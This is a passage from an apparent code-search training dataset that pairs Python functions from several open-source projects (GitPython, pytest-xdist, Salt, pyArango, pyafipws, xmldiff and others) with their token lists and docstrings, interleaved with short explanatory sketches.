        write(b"\0" * ((beginoffset + real_size) - tell()))
    # END for each entry

    # write previously cached extensions data
    if extension_data is not None:
        stream.write(extension_data)

    # write the sha over the content
    stream.write_sha()
[ "def", "write_cache", "(", "entries", ",", "stream", ",", "extension_data", "=", "None", ",", "ShaStreamCls", "=", "IndexFileSHA1Writer", ")", ":", "# wrap the stream into a compatible writer", "stream", "=", "ShaStreamCls", "(", "stream", ")", "tell", "=", "stream", ".", "tell", "write", "=", "stream", ".", "write", "# header", "version", "=", "2", "write", "(", "b\"DIRC\"", ")", "write", "(", "pack", "(", "\">LL\"", ",", "version", ",", "len", "(", "entries", ")", ")", ")", "# body", "for", "entry", "in", "entries", ":", "beginoffset", "=", "tell", "(", ")", "write", "(", "entry", "[", "4", "]", ")", "# ctime", "write", "(", "entry", "[", "5", "]", ")", "# mtime", "path", "=", "entry", "[", "3", "]", "path", "=", "force_bytes", "(", "path", ",", "encoding", "=", "defenc", ")", "plen", "=", "len", "(", "path", ")", "&", "CE_NAMEMASK", "# path length", "assert", "plen", "==", "len", "(", "path", ")", ",", "\"Path %s too long to fit into index\"", "%", "entry", "[", "3", "]", "flags", "=", "plen", "|", "(", "entry", "[", "2", "]", "&", "CE_NAMEMASK_INV", ")", "# clear possible previous values", "write", "(", "pack", "(", "\">LLLLLL20sH\"", ",", "entry", "[", "6", "]", ",", "entry", "[", "7", "]", ",", "entry", "[", "0", "]", ",", "entry", "[", "8", "]", ",", "entry", "[", "9", "]", ",", "entry", "[", "10", "]", ",", "entry", "[", "1", "]", ",", "flags", ")", ")", "write", "(", "path", ")", "real_size", "=", "(", "(", "tell", "(", ")", "-", "beginoffset", "+", "8", ")", "&", "~", "7", ")", "write", "(", "b\"\\0\"", "*", "(", "(", "beginoffset", "+", "real_size", ")", "-", "tell", "(", ")", ")", ")", "# END for each entry", "# write previously cached extensions data", "if", "extension_data", "is", "not", "None", ":", "stream", ".", "write", "(", "extension_data", ")", "# write the sha over the content", "stream", ".", "write_sha", "(", ")" ]
Write the cache represented by entries to a stream :param entries: **sorted** list of entries :param stream: stream to wrap into the ShaStreamCls - it is used for final output. :param ShaStreamCls: Type to use when writing to the stream. It produces a sha while writing to it, before the data is passed on to the wrapped stream :param extension_data: any kind of data to write as a trailer, it must begin with a 4 byte identifier, followed by its size ( 4 bytes )
[ "Write", "the", "cache", "represented", "by", "entries", "to", "a", "stream" ]
python
train
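The subtle step in write_cache above is the trailer padding: `real_size` rounds each entry (fixed fields plus path) up to an 8-byte boundary while guaranteeing at least one NUL terminator. A minimal standalone sketch of just that rule, with made-up field contents:

import struct

def pad_entry(fixed_fields, path):
    # mirror write_cache: (bytes written + 8) rounded down to a multiple of 8
    raw = fixed_fields + path
    real_size = (len(raw) + 8) & ~7   # always leaves 1-8 NUL bytes of padding
    return raw + b"\0" * (real_size - len(raw))

entry = pad_entry(struct.pack(">LL", 1, 2), b"README.md")
assert len(entry) % 8 == 0 and entry.endswith(b"\0")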
pytest-dev/pytest-xdist
xdist/scheduler/loadscope.py
https://github.com/pytest-dev/pytest-xdist/blob/9fcf8fa636bc69ee6cac9348a6ec20c87f2bb5e4/xdist/scheduler/loadscope.py#L322-L380
def schedule(self):
    """Initiate distribution of the test collection.

    Initiate scheduling of the items across the nodes. If this gets called
    again later it behaves the same as calling ``._reschedule()`` on all
    nodes so that newly added nodes will start to be used.

    If ``.collection_is_completed`` is True, this is called by the hook:

    - ``DSession.worker_collectionfinish``.
    """
    assert self.collection_is_completed

    # Initial distribution already happened, reschedule on all nodes
    if self.collection is not None:
        for node in self.nodes:
            self._reschedule(node)
        return

    # Check that all nodes collected the same tests
    if not self._check_nodes_have_same_collection():
        self.log("**Different tests collected, aborting run**")
        return

    # Collections are identical, create the final list of items
    self.collection = list(next(iter(self.registered_collections.values())))
    if not self.collection:
        return

    # Determine chunks of work (scopes)
    for nodeid in self.collection:
        scope = self._split_scope(nodeid)
        work_unit = self.workqueue.setdefault(scope, default=OrderedDict())
        work_unit[nodeid] = False

    # Avoid having more workers than work
    extra_nodes = len(self.nodes) - len(self.workqueue)

    if extra_nodes > 0:
        self.log("Shutting down {0} nodes".format(extra_nodes))

        for _ in range(extra_nodes):
            unused_node, assigned = self.assigned_work.popitem(last=True)

            self.log("Shutting down unused node {0}".format(unused_node))
            unused_node.shutdown()

    # Assign initial workload
    for node in self.nodes:
        self._assign_work_unit(node)

    # Ensure nodes start with at least two work units if possible (#277)
    for node in self.nodes:
        self._reschedule(node)

    # Initial distribution sent all tests, start node shutdown
    if not self.workqueue:
        for node in self.nodes:
            node.shutdown()
[ "def", "schedule", "(", "self", ")", ":", "assert", "self", ".", "collection_is_completed", "# Initial distribution already happened, reschedule on all nodes", "if", "self", ".", "collection", "is", "not", "None", ":", "for", "node", "in", "self", ".", "nodes", ":", "self", ".", "_reschedule", "(", "node", ")", "return", "# Check that all nodes collected the same tests", "if", "not", "self", ".", "_check_nodes_have_same_collection", "(", ")", ":", "self", ".", "log", "(", "\"**Different tests collected, aborting run**\"", ")", "return", "# Collections are identical, create the final list of items", "self", ".", "collection", "=", "list", "(", "next", "(", "iter", "(", "self", ".", "registered_collections", ".", "values", "(", ")", ")", ")", ")", "if", "not", "self", ".", "collection", ":", "return", "# Determine chunks of work (scopes)", "for", "nodeid", "in", "self", ".", "collection", ":", "scope", "=", "self", ".", "_split_scope", "(", "nodeid", ")", "work_unit", "=", "self", ".", "workqueue", ".", "setdefault", "(", "scope", ",", "default", "=", "OrderedDict", "(", ")", ")", "work_unit", "[", "nodeid", "]", "=", "False", "# Avoid having more workers than work", "extra_nodes", "=", "len", "(", "self", ".", "nodes", ")", "-", "len", "(", "self", ".", "workqueue", ")", "if", "extra_nodes", ">", "0", ":", "self", ".", "log", "(", "\"Shuting down {0} nodes\"", ".", "format", "(", "extra_nodes", ")", ")", "for", "_", "in", "range", "(", "extra_nodes", ")", ":", "unused_node", ",", "assigned", "=", "self", ".", "assigned_work", ".", "popitem", "(", "last", "=", "True", ")", "self", ".", "log", "(", "\"Shuting down unused node {0}\"", ".", "format", "(", "unused_node", ")", ")", "unused_node", ".", "shutdown", "(", ")", "# Assign initial workload", "for", "node", "in", "self", ".", "nodes", ":", "self", ".", "_assign_work_unit", "(", "node", ")", "# Ensure nodes start with at least two work units if possible (#277)", "for", "node", "in", "self", ".", "nodes", ":", "self", ".", "_reschedule", "(", "node", ")", "# Initial distribution sent all tests, start node shutdown", "if", "not", "self", ".", "workqueue", ":", "for", "node", "in", "self", ".", "nodes", ":", "node", ".", "shutdown", "(", ")" ]
Initiate distribution of the test collection. Initiate scheduling of the items across the nodes. If this gets called again later it behaves the same as calling ``._reschedule()`` on all nodes so that newly added nodes will start to be used. If ``.collection_is_completed`` is True, this is called by the hook: - ``DSession.worker_collectionfinish``.
[ "Initiate", "distribution", "of", "the", "test", "collection", "." ]
python
train
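The workqueue construction in the middle of schedule can be sketched standalone; the split_scope stand-in below takes everything before the final "::" of a pytest node id, which approximates (but is not exactly) xdist's real _split_scope:

from collections import OrderedDict

def split_scope(nodeid):
    # everything before the final "::", e.g. the test module or class
    return nodeid.rsplit("::", 1)[0]

collection = [
    "tests/test_a.py::test_one",
    "tests/test_a.py::test_two",
    "tests/test_b.py::test_three",
]
workqueue = OrderedDict()
for nodeid in collection:
    work_unit = workqueue.setdefault(split_scope(nodeid), OrderedDict())
    work_unit[nodeid] = False   # False = not yet sent to a worker

assert list(workqueue) == ["tests/test_a.py", "tests/test_b.py"]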
saltstack/salt
salt/modules/network.py
https://github.com/saltstack/salt/blob/e8541fd6e744ab0df786c0f76102e41631f45d46/salt/modules/network.py#L270-L283
def _ppid(): ''' Return a dict of pid to ppid mappings ''' ret = {} if __grains__['kernel'] == 'SunOS': cmd = 'ps -a -o pid,ppid | tail +2' else: cmd = 'ps -ax -o pid,ppid | tail -n+2' out = __salt__['cmd.run'](cmd, python_shell=True) for line in out.splitlines(): pid, ppid = line.split() ret[pid] = ppid return ret
[ "def", "_ppid", "(", ")", ":", "ret", "=", "{", "}", "if", "__grains__", "[", "'kernel'", "]", "==", "'SunOS'", ":", "cmd", "=", "'ps -a -o pid,ppid | tail +2'", "else", ":", "cmd", "=", "'ps -ax -o pid,ppid | tail -n+2'", "out", "=", "__salt__", "[", "'cmd.run'", "]", "(", "cmd", ",", "python_shell", "=", "True", ")", "for", "line", "in", "out", ".", "splitlines", "(", ")", ":", "pid", ",", "ppid", "=", "line", ".", "split", "(", ")", "ret", "[", "pid", "]", "=", "ppid", "return", "ret" ]
Return a dict of pid to ppid mappings
[ "Return", "a", "dict", "of", "pid", "to", "ppid", "mappings" ]
python
train
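The same pid -> ppid mapping can be built without Salt's `__grains__`/`__salt__` dunders; this sketch assumes a BSD/Linux-style `ps` that accepts `-ax`:

import subprocess

def ppid_map():
    """Return a dict mapping pid to ppid, parsed from `ps` output."""
    out = subprocess.check_output(["ps", "-ax", "-o", "pid,ppid"], text=True)
    ret = {}
    for line in out.splitlines()[1:]:   # skip the "PID PPID" header row
        pid, ppid = line.split()
        ret[pid] = ppid
    return ret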
odlgroup/odl
odl/space/pspace.py
https://github.com/odlgroup/odl/blob/b8443f6aca90e191ba36c91d32253c5a36249a6c/odl/space/pspace.py#L372-L388
def dtype(self): """The data type of this space. This is only well defined if all subspaces have the same dtype. Raises ------ AttributeError If any of the subspaces does not implement `dtype` or if the dtype of the subspaces does not match. """ dtypes = [space.dtype for space in self.spaces] if all(dtype == dtypes[0] for dtype in dtypes): return dtypes[0] else: raise AttributeError("`dtype`'s of subspaces not equal")
[ "def", "dtype", "(", "self", ")", ":", "dtypes", "=", "[", "space", ".", "dtype", "for", "space", "in", "self", ".", "spaces", "]", "if", "all", "(", "dtype", "==", "dtypes", "[", "0", "]", "for", "dtype", "in", "dtypes", ")", ":", "return", "dtypes", "[", "0", "]", "else", ":", "raise", "AttributeError", "(", "\"`dtype`'s of subspaces not equal\"", ")" ]
The data type of this space. This is only well defined if all subspaces have the same dtype. Raises ------ AttributeError If any of the subspaces does not implement `dtype` or if the dtype of the subspaces does not match.
[ "The", "data", "type", "of", "this", "space", "." ]
python
train
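The all-equal check generalizes to any iterable of objects exposing a NumPy-style `dtype` attribute (an assumption made here for illustration; odl subspaces happen to satisfy it):

import numpy as np

def common_dtype(spaces):
    dtypes = [space.dtype for space in spaces]
    if all(dtype == dtypes[0] for dtype in dtypes):
        return dtypes[0]
    raise AttributeError("`dtype`'s of subspaces not equal")

print(common_dtype([np.zeros(2), np.zeros(3)]))           # float64
# common_dtype([np.zeros(2), np.zeros(3, dtype=int)])     # raises AttributeError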
automl/HpBandSter
hpbandster/examples/plot_example_7_interactive_plot.py
https://github.com/automl/HpBandSter/blob/841db4b827f342e5eb7f725723ea6461ac52d45a/hpbandster/examples/plot_example_7_interactive_plot.py#L39-L51
def realtime_learning_curves(runs):
    """
    example of how to extract a different kind of learning curve.

    The x values are now the time the runs finished, not the budget anymore.
    We no longer plot the validation loss on the y axis, but now the test accuracy.

    This is just to show how to get different information into the interactive plot.

    """
    sr = sorted(runs, key=lambda r: r.budget)

    lc = list(filter(lambda t: not t[1] is None, [(r.time_stamps['finished'], r.info['test accuracy']) for r in sr]))

    return([lc,])
[ "def", "realtime_learning_curves", "(", "runs", ")", ":", "sr", "=", "sorted", "(", "runs", ",", "key", "=", "lambda", "r", ":", "r", ".", "budget", ")", "lc", "=", "list", "(", "filter", "(", "lambda", "t", ":", "not", "t", "[", "1", "]", "is", "None", ",", "[", "(", "r", ".", "time_stamps", "[", "'finished'", "]", ",", "r", ".", "info", "[", "'test accuracy'", "]", ")", "for", "r", "in", "sr", "]", ")", ")", "return", "(", "[", "lc", ",", "]", ")" ]
example of how to extract a different kind of learning curve. The x values are now the time the runs finished, not the budget anymore. We no longer plot the validation loss on the y axis, but now the test accuracy. This is just to show how to get different information into the interactive plot.
[ "example", "how", "to", "extract", "a", "different", "kind", "of", "learning", "curve", ".", "The", "x", "values", "are", "now", "the", "time", "the", "runs", "finished", "not", "the", "budget", "anymore", ".", "We", "no", "longer", "plot", "the", "validation", "loss", "on", "the", "y", "axis", "but", "now", "the", "test", "accuracy", ".", "This", "is", "just", "to", "show", "how", "to", "get", "different", "information", "into", "the", "interactive", "plot", "." ]
python
train
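To see the extraction in isolation, here is a toy stand-in for HpBandSter's run objects (the real ones come out of a Result object); the field names mirror those used above:

from collections import namedtuple

Run = namedtuple("Run", "budget time_stamps info")

runs = [
    Run(9, {"finished": 30.0}, {"test accuracy": 0.91}),
    Run(3, {"finished": 12.0}, {"test accuracy": None}),   # filtered out
    Run(1, {"finished": 5.0},  {"test accuracy": 0.80}),
]
sr = sorted(runs, key=lambda r: r.budget)
lc = [(r.time_stamps["finished"], r.info["test accuracy"])
      for r in sr if r.info["test accuracy"] is not None]
print([lc])   # [[(5.0, 0.8), (30.0, 0.91)]]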
Cymmetria/honeycomb
honeycomb/utils/config_utils.py
https://github.com/Cymmetria/honeycomb/blob/33ea91b5cf675000e4e85dd02efe580ea6e95c86/honeycomb/utils/config_utils.py#L30-L38
def validate_config(config_json, fields): """Validate a JSON file configuration against list of :obj:`honeycomb.defs.ConfigField`.""" for field_name, validator_obj in six.iteritems(fields): field_value = config_json.get(field_name, None) if field_value is None: raise exceptions.ConfigFieldMissing(field_name) if not validator_obj.validator_func(field_value): raise exceptions.ConfigFieldValidationError(field_name, field_value, validator_obj.get_error_message())
[ "def", "validate_config", "(", "config_json", ",", "fields", ")", ":", "for", "field_name", ",", "validator_obj", "in", "six", ".", "iteritems", "(", "fields", ")", ":", "field_value", "=", "config_json", ".", "get", "(", "field_name", ",", "None", ")", "if", "field_value", "is", "None", ":", "raise", "exceptions", ".", "ConfigFieldMissing", "(", "field_name", ")", "if", "not", "validator_obj", ".", "validator_func", "(", "field_value", ")", ":", "raise", "exceptions", ".", "ConfigFieldValidationError", "(", "field_name", ",", "field_value", ",", "validator_obj", ".", "get_error_message", "(", ")", ")" ]
Validate a JSON file configuration against list of :obj:`honeycomb.defs.ConfigField`.
[ "Validate", "a", "JSON", "file", "configuration", "against", "list", "of", ":", "obj", ":", "honeycomb", ".", "defs", ".", "ConfigField", "." ]
python
train
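A self-contained version of the same loop, with a minimal stand-in for honeycomb.defs.ConfigField and plain built-in exceptions in place of honeycomb's ConfigFieldMissing/ConfigFieldValidationError:

class ConfigField(object):
    """Minimal stand-in for honeycomb.defs.ConfigField."""
    def __init__(self, validator_func, error_message):
        self.validator_func = validator_func
        self._error_message = error_message

    def get_error_message(self):
        return self._error_message

fields = {
    "port": ConfigField(lambda v: isinstance(v, int) and 0 < v < 65536,
                        "port must be an integer between 1 and 65535"),
}
config_json = {"port": 8080}

# same control flow as validate_config above; built-in exceptions stand in
# for honeycomb's ConfigFieldMissing / ConfigFieldValidationError
for field_name, validator_obj in fields.items():
    field_value = config_json.get(field_name, None)
    if field_value is None:
        raise KeyError(field_name)
    if not validator_obj.validator_func(field_value):
        raise ValueError(validator_obj.get_error_message())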
ArangoDB-Community/pyArango
pyArango/graph.py
https://github.com/ArangoDB-Community/pyArango/blob/dd72e5f6c540e5e148943d615ddf7553bb78ce0b/pyArango/graph.py#L142-L170
def createEdge(self, collectionName, _fromId, _toId, edgeAttributes, waitForSync = False) : """creates an edge between two documents""" if not _fromId : raise ValueError("Invalid _fromId: %s" % _fromId) if not _toId : raise ValueError("Invalid _toId: %s" % _toId) if collectionName not in self.definitions : raise KeyError("'%s' is not among the edge definitions" % collectionName) url = "%s/edge/%s" % (self.URL, collectionName) self.database[collectionName].validatePrivate("_from", _fromId) self.database[collectionName].validatePrivate("_to", _toId) ed = self.database[collectionName].createEdge() ed.set(edgeAttributes) ed.validate() payload = ed.getStore() payload.update({'_from' : _fromId, '_to' : _toId}) r = self.connection.session.post(url, data = json.dumps(payload, default=str), params = {'waitForSync' : waitForSync}) data = r.json() if r.status_code == 201 or r.status_code == 202 : return self.database[collectionName][data["edge"]["_key"]] # print "\ngraph 160, ", data, payload, _fromId raise CreationError("Unable to create edge, %s" % r.json()["errorMessage"], data)
[ "def", "createEdge", "(", "self", ",", "collectionName", ",", "_fromId", ",", "_toId", ",", "edgeAttributes", ",", "waitForSync", "=", "False", ")", ":", "if", "not", "_fromId", ":", "raise", "ValueError", "(", "\"Invalid _fromId: %s\"", "%", "_fromId", ")", "if", "not", "_toId", ":", "raise", "ValueError", "(", "\"Invalid _toId: %s\"", "%", "_toId", ")", "if", "collectionName", "not", "in", "self", ".", "definitions", ":", "raise", "KeyError", "(", "\"'%s' is not among the edge definitions\"", "%", "collectionName", ")", "url", "=", "\"%s/edge/%s\"", "%", "(", "self", ".", "URL", ",", "collectionName", ")", "self", ".", "database", "[", "collectionName", "]", ".", "validatePrivate", "(", "\"_from\"", ",", "_fromId", ")", "self", ".", "database", "[", "collectionName", "]", ".", "validatePrivate", "(", "\"_to\"", ",", "_toId", ")", "ed", "=", "self", ".", "database", "[", "collectionName", "]", ".", "createEdge", "(", ")", "ed", ".", "set", "(", "edgeAttributes", ")", "ed", ".", "validate", "(", ")", "payload", "=", "ed", ".", "getStore", "(", ")", "payload", ".", "update", "(", "{", "'_from'", ":", "_fromId", ",", "'_to'", ":", "_toId", "}", ")", "r", "=", "self", ".", "connection", ".", "session", ".", "post", "(", "url", ",", "data", "=", "json", ".", "dumps", "(", "payload", ",", "default", "=", "str", ")", ",", "params", "=", "{", "'waitForSync'", ":", "waitForSync", "}", ")", "data", "=", "r", ".", "json", "(", ")", "if", "r", ".", "status_code", "==", "201", "or", "r", ".", "status_code", "==", "202", ":", "return", "self", ".", "database", "[", "collectionName", "]", "[", "data", "[", "\"edge\"", "]", "[", "\"_key\"", "]", "]", "# print \"\\ngraph 160, \", data, payload, _fromId", "raise", "CreationError", "(", "\"Unable to create edge, %s\"", "%", "r", ".", "json", "(", ")", "[", "\"errorMessage\"", "]", ",", "data", ")" ]
creates an edge between two documents
[ "creates", "an", "edge", "between", "two", "documents" ]
python
train
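What the method sends over the wire can be approximated with plain requests against ArangoDB's graph (gharial) HTTP API; the server URL, graph and collection names, and vertex ids below are placeholders, and pyArango's document validation layer is skipped entirely:

import json
import requests

url = "http://localhost:8529/_api/gharial/myGraph/edge/knows"   # placeholder
payload = {"_from": "persons/alice", "_to": "persons/bob", "since": 2020}
r = requests.post(url, data=json.dumps(payload, default=str),
                  params={"waitForSync": False})
if r.status_code in (201, 202):
    print(r.json()["edge"]["_key"])
else:
    raise RuntimeError(r.json().get("errorMessage", "unknown error"))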
reingart/pyafipws
utils.py
https://github.com/reingart/pyafipws/blob/ee87cfe4ac12285ab431df5fec257f103042d1ab/utils.py#L228-L304
def Conectar(self, cache=None, wsdl=None, proxy="", wrapper=None, cacert=None, timeout=30, soap_server=None): "Conectar cliente soap del web service" try: # analizar transporte y servidor proxy: if wrapper: Http = set_http_wrapper(wrapper) self.Version = self.Version + " " + Http._wrapper_version if isinstance(proxy, dict): proxy_dict = proxy else: proxy_dict = parse_proxy(proxy) self.log("Proxy Dict: %s" % str(proxy_dict)) if self.HOMO or not wsdl: wsdl = self.WSDL # agregar sufijo para descargar descripción del servicio ?WSDL o ?wsdl if not wsdl.endswith(self.WSDL[-5:]) and wsdl.startswith("http"): wsdl += self.WSDL[-5:] if not cache or self.HOMO: # use 'cache' from installation base directory cache = os.path.join(self.InstallDir, 'cache') # deshabilitar verificación cert. servidor si es nulo falso vacio if not cacert: cacert = None elif cacert is True: # usar certificados predeterminados que vienen en la biblioteca cacert = os.path.join(httplib2.__path__[0], 'cacerts.txt') elif cacert.startswith("-----BEGIN CERTIFICATE-----"): pass else: if not os.path.exists(cacert): self.log("Buscando CACERT en conf...") cacert = os.path.join(self.InstallDir, "conf", os.path.basename(cacert)) if cacert and not os.path.exists(cacert): self.log("No se encuentra CACERT: %s" % str(cacert)) warnings.warn("No se encuentra CACERT: %s" % str(cacert)) cacert = None # wrong version, certificates not found... raise RuntimeError("Error de configuracion CACERT ver DebugLog") return False self.log("Conectando a wsdl=%s cache=%s proxy=%s" % (wsdl, cache, proxy_dict)) # analizar espacio de nombres (axis vs .net): ns = 'ser' if self.WSDL[-5:] == "?wsdl" else None self.client = SoapClient( wsdl = wsdl, cache = cache, proxy = proxy_dict, cacert = cacert, timeout = timeout, ns = ns, soap_server = soap_server, trace = "--trace" in sys.argv) self.cache = cache # utilizado por WSLPG y WSAA (Ticket de Acceso) self.wsdl = wsdl # utilizado por TrazaMed (para corregir el location) # corrijo ubicación del servidor (puerto http 80 en el WSDL AFIP) for service in self.client.services.values(): for port in service['ports'].values(): location = port['location'] if location and location.startswith("http://"): warnings.warn("Corrigiendo WSDL ... %s" % location) location = location.replace("http://", "https://").replace(":80", ":443") # usar servidor real si en el WSDL figura "localhost" localhost = 'https://localhost:' if location.startswith(localhost): url = urlparse(wsdl) location = location.replace("localhost", url.hostname) location = location.replace(":9051", ":443") port['location'] = location return True except: ex = traceback.format_exception( sys.exc_type, sys.exc_value, sys.exc_traceback) self.Traceback = ''.join(ex) try: self.Excepcion = traceback.format_exception_only( sys.exc_type, sys.exc_value)[0] except: self.Excepcion = u"<no disponible>" if self.LanzarExcepciones: raise return False
[ "def", "Conectar", "(", "self", ",", "cache", "=", "None", ",", "wsdl", "=", "None", ",", "proxy", "=", "\"\"", ",", "wrapper", "=", "None", ",", "cacert", "=", "None", ",", "timeout", "=", "30", ",", "soap_server", "=", "None", ")", ":", "try", ":", "# analizar transporte y servidor proxy:", "if", "wrapper", ":", "Http", "=", "set_http_wrapper", "(", "wrapper", ")", "self", ".", "Version", "=", "self", ".", "Version", "+", "\" \"", "+", "Http", ".", "_wrapper_version", "if", "isinstance", "(", "proxy", ",", "dict", ")", ":", "proxy_dict", "=", "proxy", "else", ":", "proxy_dict", "=", "parse_proxy", "(", "proxy", ")", "self", ".", "log", "(", "\"Proxy Dict: %s\"", "%", "str", "(", "proxy_dict", ")", ")", "if", "self", ".", "HOMO", "or", "not", "wsdl", ":", "wsdl", "=", "self", ".", "WSDL", "# agregar sufijo para descargar descripción del servicio ?WSDL o ?wsdl", "if", "not", "wsdl", ".", "endswith", "(", "self", ".", "WSDL", "[", "-", "5", ":", "]", ")", "and", "wsdl", ".", "startswith", "(", "\"http\"", ")", ":", "wsdl", "+=", "self", ".", "WSDL", "[", "-", "5", ":", "]", "if", "not", "cache", "or", "self", ".", "HOMO", ":", "# use 'cache' from installation base directory ", "cache", "=", "os", ".", "path", ".", "join", "(", "self", ".", "InstallDir", ",", "'cache'", ")", "# deshabilitar verificación cert. servidor si es nulo falso vacio", "if", "not", "cacert", ":", "cacert", "=", "None", "elif", "cacert", "is", "True", ":", "# usar certificados predeterminados que vienen en la biblioteca", "cacert", "=", "os", ".", "path", ".", "join", "(", "httplib2", ".", "__path__", "[", "0", "]", ",", "'cacerts.txt'", ")", "elif", "cacert", ".", "startswith", "(", "\"-----BEGIN CERTIFICATE-----\"", ")", ":", "pass", "else", ":", "if", "not", "os", ".", "path", ".", "exists", "(", "cacert", ")", ":", "self", ".", "log", "(", "\"Buscando CACERT en conf...\"", ")", "cacert", "=", "os", ".", "path", ".", "join", "(", "self", ".", "InstallDir", ",", "\"conf\"", ",", "os", ".", "path", ".", "basename", "(", "cacert", ")", ")", "if", "cacert", "and", "not", "os", ".", "path", ".", "exists", "(", "cacert", ")", ":", "self", ".", "log", "(", "\"No se encuentra CACERT: %s\"", "%", "str", "(", "cacert", ")", ")", "warnings", ".", "warn", "(", "\"No se encuentra CACERT: %s\"", "%", "str", "(", "cacert", ")", ")", "cacert", "=", "None", "# wrong version, certificates not found...", "raise", "RuntimeError", "(", "\"Error de configuracion CACERT ver DebugLog\"", ")", "return", "False", "self", ".", "log", "(", "\"Conectando a wsdl=%s cache=%s proxy=%s\"", "%", "(", "wsdl", ",", "cache", ",", "proxy_dict", ")", ")", "# analizar espacio de nombres (axis vs .net):", "ns", "=", "'ser'", "if", "self", ".", "WSDL", "[", "-", "5", ":", "]", "==", "\"?wsdl\"", "else", "None", "self", ".", "client", "=", "SoapClient", "(", "wsdl", "=", "wsdl", ",", "cache", "=", "cache", ",", "proxy", "=", "proxy_dict", ",", "cacert", "=", "cacert", ",", "timeout", "=", "timeout", ",", "ns", "=", "ns", ",", "soap_server", "=", "soap_server", ",", "trace", "=", "\"--trace\"", "in", "sys", ".", "argv", ")", "self", ".", "cache", "=", "cache", "# utilizado por WSLPG y WSAA (Ticket de Acceso)", "self", ".", "wsdl", "=", "wsdl", "# utilizado por TrazaMed (para corregir el location)", "# corrijo ubicación del servidor (puerto http 80 en el WSDL AFIP)", "for", "service", "in", "self", ".", "client", ".", "services", ".", "values", "(", ")", ":", "for", "port", "in", "service", "[", "'ports'", "]", ".", "values", "(", ")", ":", "location", "=", 
"port", "[", "'location'", "]", "if", "location", "and", "location", ".", "startswith", "(", "\"http://\"", ")", ":", "warnings", ".", "warn", "(", "\"Corrigiendo WSDL ... %s\"", "%", "location", ")", "location", "=", "location", ".", "replace", "(", "\"http://\"", ",", "\"https://\"", ")", ".", "replace", "(", "\":80\"", ",", "\":443\"", ")", "# usar servidor real si en el WSDL figura \"localhost\"", "localhost", "=", "'https://localhost:'", "if", "location", ".", "startswith", "(", "localhost", ")", ":", "url", "=", "urlparse", "(", "wsdl", ")", "location", "=", "location", ".", "replace", "(", "\"localhost\"", ",", "url", ".", "hostname", ")", "location", "=", "location", ".", "replace", "(", "\":9051\"", ",", "\":443\"", ")", "port", "[", "'location'", "]", "=", "location", "return", "True", "except", ":", "ex", "=", "traceback", ".", "format_exception", "(", "sys", ".", "exc_type", ",", "sys", ".", "exc_value", ",", "sys", ".", "exc_traceback", ")", "self", ".", "Traceback", "=", "''", ".", "join", "(", "ex", ")", "try", ":", "self", ".", "Excepcion", "=", "traceback", ".", "format_exception_only", "(", "sys", ".", "exc_type", ",", "sys", ".", "exc_value", ")", "[", "0", "]", "except", ":", "self", ".", "Excepcion", "=", "u\"<no disponible>\"", "if", "self", ".", "LanzarExcepciones", ":", "raise", "return", "False" ]
Connect the SOAP client of the web service
[ "Conectar", "cliente", "soap", "del", "web", "service" ]
python
train
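The WSDL location fix-up near the end of Conectar is the non-obvious part; this standalone sketch reproduces just those rewrite rules (http -> https, port 80 -> 443, and swapping "localhost" for the WSDL host) with made-up URLs:

try:
    from urllib.parse import urlparse   # Python 3
except ImportError:
    from urlparse import urlparse       # Python 2, which the original targets

def fix_location(location, wsdl):
    if location and location.startswith("http://"):
        location = location.replace("http://", "https://").replace(":80", ":443")
        # use the real server when the WSDL advertises "localhost"
        if location.startswith("https://localhost:"):
            host = urlparse(wsdl).hostname
            location = location.replace("localhost", host).replace(":9051", ":443")
    return location

print(fix_location("http://localhost:9051/ws", "https://example.gov.ar/ws?wsdl"))
# https://example.gov.ar:443/ws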
Shoobx/xmldiff
xmldiff/main.py
https://github.com/Shoobx/xmldiff/blob/ec7835bce9ba69ff4ce03ab6c11397183b6f8411/xmldiff/main.py#L129-L143
def patch_file(actions, tree):
    """Takes two filenames or streams, one with XML, the other a diff"""
    tree = etree.parse(tree)

    if isinstance(actions, six.string_types):
        # It's a string, so it's a filename
        with open(actions) as f:
            actions = f.read()
    else:
        # We assume it's a stream
        actions = actions.read()

    actions = patch.DiffParser().parse(actions)
    tree = patch_tree(actions, tree)
    return etree.tounicode(tree)
[ "def", "patch_file", "(", "actions", ",", "tree", ")", ":", "tree", "=", "etree", ".", "parse", "(", "tree", ")", "if", "isinstance", "(", "actions", ",", "six", ".", "string_types", ")", ":", "# It's a string, so it's a filename", "with", "open", "(", "actions", ")", "as", "f", ":", "actions", "=", "f", ".", "read", "(", ")", "else", ":", "# We assume it's a stream", "actions", "=", "actions", ".", "read", "(", ")", "actions", "=", "patch", ".", "DiffParser", "(", ")", ".", "parse", "(", "actions", ")", "tree", "=", "patch_tree", "(", "actions", ",", "tree", ")", "return", "etree", ".", "tounicode", "(", "tree", ")" ]
Takes two filenames or streams, one with XML, the other a diff
[ "Takes", "two", "filenames", "or", "streams", "one", "with", "XML", "the", "other", "a", "diff" ]
python
train
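Since `actions` may be a filename or an open stream and `tree` goes straight to etree.parse, usage is short; the file names here are placeholders:

from xmldiff import main

# from file names
print(main.patch_file("changes.diff", "document.xml"))

# or from open streams
with open("changes.diff") as diff, open("document.xml") as doc:
    print(main.patch_file(diff, doc))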
etcher-be/elib_miz
elib_miz/mission.py
https://github.com/etcher-be/elib_miz/blob/f28db58fadb2cd9341e0ae4d65101c0cc7d8f3d7/elib_miz/mission.py#L597-L614
def get_country_by_id(self, country_id) -> 'Country': """ Gets a country in this coalition by its ID Args: country_id: country Id Returns: Country """ VALID_POSITIVE_INT.validate(country_id, 'get_country_by_id', exc=ValueError) if country_id not in self._countries_by_id.keys(): for country in self.countries: if country.country_id == country_id: return country raise ValueError(country_id) else: return self._countries_by_id[country_id]
[ "def", "get_country_by_id", "(", "self", ",", "country_id", ")", "->", "'Country'", ":", "VALID_POSITIVE_INT", ".", "validate", "(", "country_id", ",", "'get_country_by_id'", ",", "exc", "=", "ValueError", ")", "if", "country_id", "not", "in", "self", ".", "_countries_by_id", ".", "keys", "(", ")", ":", "for", "country", "in", "self", ".", "countries", ":", "if", "country", ".", "country_id", "==", "country_id", ":", "return", "country", "raise", "ValueError", "(", "country_id", ")", "else", ":", "return", "self", ".", "_countries_by_id", "[", "country_id", "]" ]
Gets a country in this coalition by its ID Args: country_id: country Id Returns: Country
[ "Gets", "a", "country", "in", "this", "coalition", "by", "its", "ID" ]
python
train
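The lookup pattern above (consult a prebuilt id index, fall back to a linear scan) in isolation, with plain objects instead of elib_miz's Country and validator:

class Country:
    def __init__(self, country_id, name):
        self.country_id, self.name = country_id, name

countries = [Country(1, "USA"), Country(2, "Russia")]
countries_by_id = {1: countries[0]}          # partially populated cache

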